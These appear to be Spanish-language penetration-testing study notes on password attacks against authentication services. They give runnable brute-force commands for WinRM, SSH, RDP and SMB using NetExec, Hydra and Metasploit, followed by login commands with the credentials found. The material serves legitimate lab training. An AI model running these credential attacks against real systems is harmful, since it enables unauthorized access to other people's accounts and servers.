Ataques de Contraseñas y Servicios de Autenticación

Durante pruebas de penetración, los equipos suelen tener servicios para gestionar o crear contenido. Algunos comunes son:

Todos estos servicios requieren autenticación (usuario + contraseña) y algunos permiten llaves en vez de contraseñas.

Para gestionar un Windows Server:

Protocolo de Microsoft basado en WS-Management y SOAP.
Se activa manualmente en Windows 10/11 ⚠️
Usa certificados o métodos de autenticación específicos para mayor seguridad.
Herramientas útiles:
- NetExec – Para fuerza bruta y ejecución remota de comandos 🚀
- Evil-WinRM – Interfaz sencilla para PowerShell remoto 🐍

EjemploS

netexec winrm <IP> -u username.list -p password.list

Cuando aparezca pWn3d! es que se ha encontrado el usuario
Pasted image 20250821184312.png

evil-winrm -i <IP> -u <usuario> -p <contraseña>

Pasted image 20250821184849.png

Conexión segura para comandos y transferencia de archivos 📂🔒
Usa cifrado simétrico, asimétrico y hashing:
- 🔑 Simétrico: misma llave para cifrar/descifrar
- 🗝️ Asimétrico: llave pública y privada
- 🧮 Hashing: verificar autenticidad del mensaje

Ataques de fuerza bruta con Hydra:

hydra -L username.list -P password.list ssh://<IP>

Pasted image 20250821184559.png

Conexión SSH:

ssh <usuariio>@<IP>

Pasted image 20250821185305.png

Fuerza bruta con Hydra:

hydra -L username.list -P password.list rdp://<ip>

Fuerza bruta con Netexec:

netexec rdp <IP> -u username.list -p password.list

Conectarse por RDP

xfreerdp /v:<IP> /u:<usuario> /p:<contraseña>

📂 Samba

Fuerza bruta con Hydra:

hydra -L username.list -P password.list smb://<IP>

Fuerza bruta con Netexec:

netexec smb 10.129.123.210 -u username.list -p password.list

Fuerza bruta con Metaexploit:

msfconsole -q 
use auxiliary/scanner/smb/smb_login 
set user_file username.list 
set pass_file password.list
set RHOSTS <IP>
run

{AF999D93-3143-4145-A595-30DFBC99E467}.png
conectrase por samba

smbclient //<IP>/<recurso> -U <usuario